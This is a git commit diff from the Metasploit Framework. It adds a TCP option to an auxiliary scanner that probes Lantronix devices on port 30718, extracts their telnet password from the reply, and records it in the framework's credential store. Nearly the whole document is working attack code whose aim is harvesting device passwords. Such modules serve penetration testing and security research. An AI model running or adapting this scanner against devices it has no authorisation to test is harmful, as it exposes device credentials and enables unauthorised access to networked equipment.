Land #4817, CHECK_TCP option for Lantronix module

2015-02-25 13:16:14 -06:00 · 2015-02-25 13:16:14 -06:00 · 3cf94740e6
parent 501301eae0 d301752a88
commit 3cf94740e6
1 changed files with 42 additions and 23 deletions
--- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb
+++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb
@ -26,7 +26,8 @@ class Metasploit4 < Msf::Auxiliary
    register_options(
      [
        Opt::CHOST,
-        Opt::RPORT(30718)
+        Opt::RPORT(30718),
+        OptBool.new('CHECK_TCP', [false , 'Check TCP instead of UDP', false])
      ], self.class)
  end

@ -35,26 +36,28 @@ class Metasploit4 < Msf::Auxiliary
    password = nil

    begin
-      # Create an unbound UDP socket if no CHOST is specified, otherwise
-      # create a UDP socket bound to CHOST (in order to avail of pivoting)
-      udp_sock = Rex::Socket::Udp.create( {
+      sock_opts = {
        'LocalHost' => datastore['CHOST'] || nil,
        'PeerHost'  => ip,
        'PeerPort'  => datastore['RPORT'],
-        'Context'   =>
-        {
+        'Context'   =>  {
          'Msf' => framework,
          'MsfExploit' => self
        }
-      })
-
-      udp_sock.put(setup_probe)
-
-      res = udp_sock.recvfrom(65535, 0.5) and res[1]
-
-      if res
-        password = parse_reply(res)
+      }
+      if datastore['CHECK_TCP']
+        vprint_good("Checking Lantronix TCP Socket #{datastore['RPORT']} on #{ip}")
+        rem_sock = Rex::Socket::Tcp.create(sock_opts)
+      else
+        # Create an unbound UDP socket if no CHOST is specified, otherwise
+        # create a UDP socket bound to CHOST (in order to avail of pivoting)
+        vprint_good("Checking Lantronix UDP Socket #{datastore['RPORT']} on #{ip}")
+        rem_sock = Rex::Socket::Udp.create(sock_opts)
      end
+      rem_sock.put(setup_probe)
+      res = rem_sock.recvfrom(65535, 0.5) and res[1]
+
+      password = parse_reply(res)
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
      print_error("Connection error")
    rescue ::Interrupt
@ -62,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
-      udp_sock.close if udp_sock
+      rem_sock.close if rem_sock
    end

    if password
@ -71,16 +74,32 @@ class Metasploit4 < Msf::Auxiliary
      else
        print_good("#{rhost} - Telnet password found: #{password.to_s}")

-        report_auth_info({
-          :host         => rhost,
-          :port         => 9999,
-          :sname        => 'telnet',
-          :duplicate_ok => false,
-          :pass         => password.to_s
-        })
+        service_data = {
+          address: ip,
+          port: 9999,
+          service_name: 'telnet',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
+        }
+
+        credential_data = {
+          module_fullname: self.fullname,
+          origin_type: :service,
+          private_data: password.to_s,
+          private_type: :password
+        }.merge(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+          core: credential_core,
+          last_attempted_at: DateTime.now,
+          status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }.merge(service_data)
+
+        create_credential_login(login_data)
      end
    end
-
  end

  def parse_reply(pkt)